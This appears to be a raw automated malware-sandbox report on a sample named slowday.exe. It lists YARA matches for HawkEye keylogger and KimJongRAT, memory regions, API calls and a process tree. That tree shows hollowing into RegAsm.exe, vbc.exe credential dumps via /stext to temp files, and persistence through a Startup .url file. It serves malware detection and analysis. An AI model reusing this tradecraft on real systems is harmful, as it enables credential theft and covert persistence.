            Source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, type: DROPPEDMatched rule: URL_File_Local_EXE date = 2017-10-04, author = Florian Roth, description = Detects an .url file that points to a local executable, reference = https://twitter.com/malwareforme/status/915300883012870144, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0044465C appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0044466E appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00415F19 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0044468C appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00444B90 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0041607A appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 0042F6EF appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004162C2 appears 174 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004083D6 appears 64 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 1_2_00FAACC8 NtUnmapViewOfSection,NtUnmapViewOfSection,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
Source: slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameReborn Stub.exe" vs slowday.exe
Source: slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameReborn Stub.exe" vs slowday.exe
Source: slowday.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\slowday.exe | File created: C:\Users\user\AppData\Roaming\winlogons
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@24/18@0/1
Source: 7.3.winlogons.exe.3790000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 8.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 8.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 8.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 0.3.slowday.exe.3b50000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 8.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 8.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 8.0.RegAsm.exe.400000.1.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.3.slowday.exe.3b50000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 0.3.slowday.exe.3b50000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 0.3.slowday.exe.3b50000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 8.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 8.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 7.3.winlogons.exe.3790000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.3.winlogons.exe.3790000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.0.RegAsm.exe.400000.1.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 8.2.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 8.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 8.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.3.winlogons.exe.3790000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 7.3.winlogons.exe.3790000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 7.3.winlogons.exe.3790000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.0.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.slowday.exe.3b50000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.slowday.exe.3b50000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 1.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 1.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 8.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 8.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 8.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 8.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 8.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 8.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 1.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 1.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.cs | Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 8.0.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.cs | Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E2A0F4 GetLastError,FormatMessageW,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
            Source: slowday.exeVirustotal: Detection: 74%
            Source: slowday.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\slowday.exeFile read: C:\Users\user\Desktop\slowday.exeJump to behavior
            Source: C:\Users\user\Desktop\slowday.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\slowday.exe "C:\Users\user\Desktop\slowday.exe"
            Source: C:\Users\user\Desktop\slowday.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe "C:\Users\user\AppData\Roaming\winlogons\winlogons.exe"
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
            Source: C:\Users\user\Desktop\slowday.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
